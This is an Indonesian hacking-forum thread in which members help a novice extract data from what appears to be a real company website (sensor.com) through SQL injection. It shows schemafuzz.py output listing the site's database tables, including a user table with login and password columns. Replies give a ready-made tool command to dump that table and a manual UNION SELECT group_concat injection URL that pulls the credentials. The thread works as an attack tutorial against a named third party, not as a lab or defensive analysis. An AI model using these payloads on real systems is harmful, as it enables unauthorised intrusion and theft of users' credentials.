schemafuzz.py

[pataka]

mas mo nanya ne...kasih tutor dong tentang schemafuzz....kok kagak isa ya ngbuka isi tabel column...abis coba hasilnya kya gini..

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.sensor.com/eng/news_detail.p ... ,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 03:23:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: trueidc
User: trueidc@localhost
Version: 5.0.22
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0]trueidc

[-] [03:23:37]
[-] Total URL Requests 3
[-] Done

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.sensor.com/eng/news_detail.p ... ,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 03:27:52
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: trueidc
User: trueidc@localhost
Version: 5.0.22
[+] Showing Tables & Columns from database "trueidc"
[+] Number of Tables: 9

[Database]: trueidc
[Table: Columns]
[0]tbco_location: ID,sDetailT,sDetailE,sFilename_top,sFilename_left
[1]tbdedicate: ID,sTopDetailT,sTopDetailE,sMidDetailT,sMidDetailE,sFilename
[2]tbfaq: ID,sQuestionT,sAnswerT,sQuestionE,sAnswerE,bEnableT,bEnableE,sPostName,sPostEmail,sType
[3]tblink: ID,sType,sSubjectT,sSubjectE,sLink,bEnableT,bEnableE,sFilename
[4]tbnewspro: ID,dDate,sTopicT,sDetailT,sTopicE,sDetailE,sFilename,bEnableT,bEnableE
[5]tbproduct_service_home: ID,dDate,sTopicT,sTopicE,bEnableT,bEnableE,sLink
[6]tbserver_spec: ID,sNameT,sDetailT,sNameE,sDetailE,sFilename,bEnableT,bEnableE
[7]tbuser: ID,sName,sLogin,sPassword,bAdmin
[8]tbwebbase: ID,iOrder,sContentT,sContentE,sFilename

[-] [03:30:57]
[-] Total URL Requests 65
[-] Done

[shad.hckr]

kalo ga bisa pake manual aja.. kan dah keliatan tuh table ma column..

[pataka]

caranya gmn...kasih tutorial dong mas...thanks...

[defacement88]

Code: Select all

./schemafuzz.py --dump -u http://www.sensor.com/eng/news_detail.php?id=1+AND+1=2+UNION+SELECT+0,1,2,3,darkc0de,5,6,7,8-- -D trueidc -T tbuser -C ID,sName,sLogin,sPassword,bAdmin

[lfay]

manual aja dlu ..

gak usah pake tools..
mungkin cepet paham kawan....

[shad.hckr]

bener tuh kata om lfay.. pahami dasarnya dulu biar tau cara kerjanya.. kan lumayan buat tambah2 ilmu daripada make tools tp kita ga tau apa2.. hehehe.. peace..

[aries deris]

Code: Select all

[7]tbuser: ID,sName,sLogin,sPassword,bAdmin

tuh kan table nya udah tau
lok manualan carane pernah di posting kok
coba searh aja
tar jadinya kek gini

Code: Select all

http://www.sensor.com/eng/news_detail.php?id=1+AND+1=2+UNION+SELECT+0,1,2,3,group_concat(ID,0x3a,sName,0x3a,sLogin,0x3a,sPassword,0x3a,bAdmin),5,6,7,8 from tbuser--

dimana 0x3a mempnyai nilai = ":"

begitu kira2
maaf lok gag paham
hehehe

[pataka]

wah...sip2 mas...q coba pelajarin dulu ya...makasih atas tutornya...majoe trs dah bwt YF

[vodork]

kalo aku sih libih mantap kalo manual 8) 8)
olah raga otak kalo gak bisa ketemu2 bisa langsung pukul pake palu keyboardnya
peace

[pataka]

percuma mas kgak mempan soalnya keyboard q terbuat dari baja murni...hahaha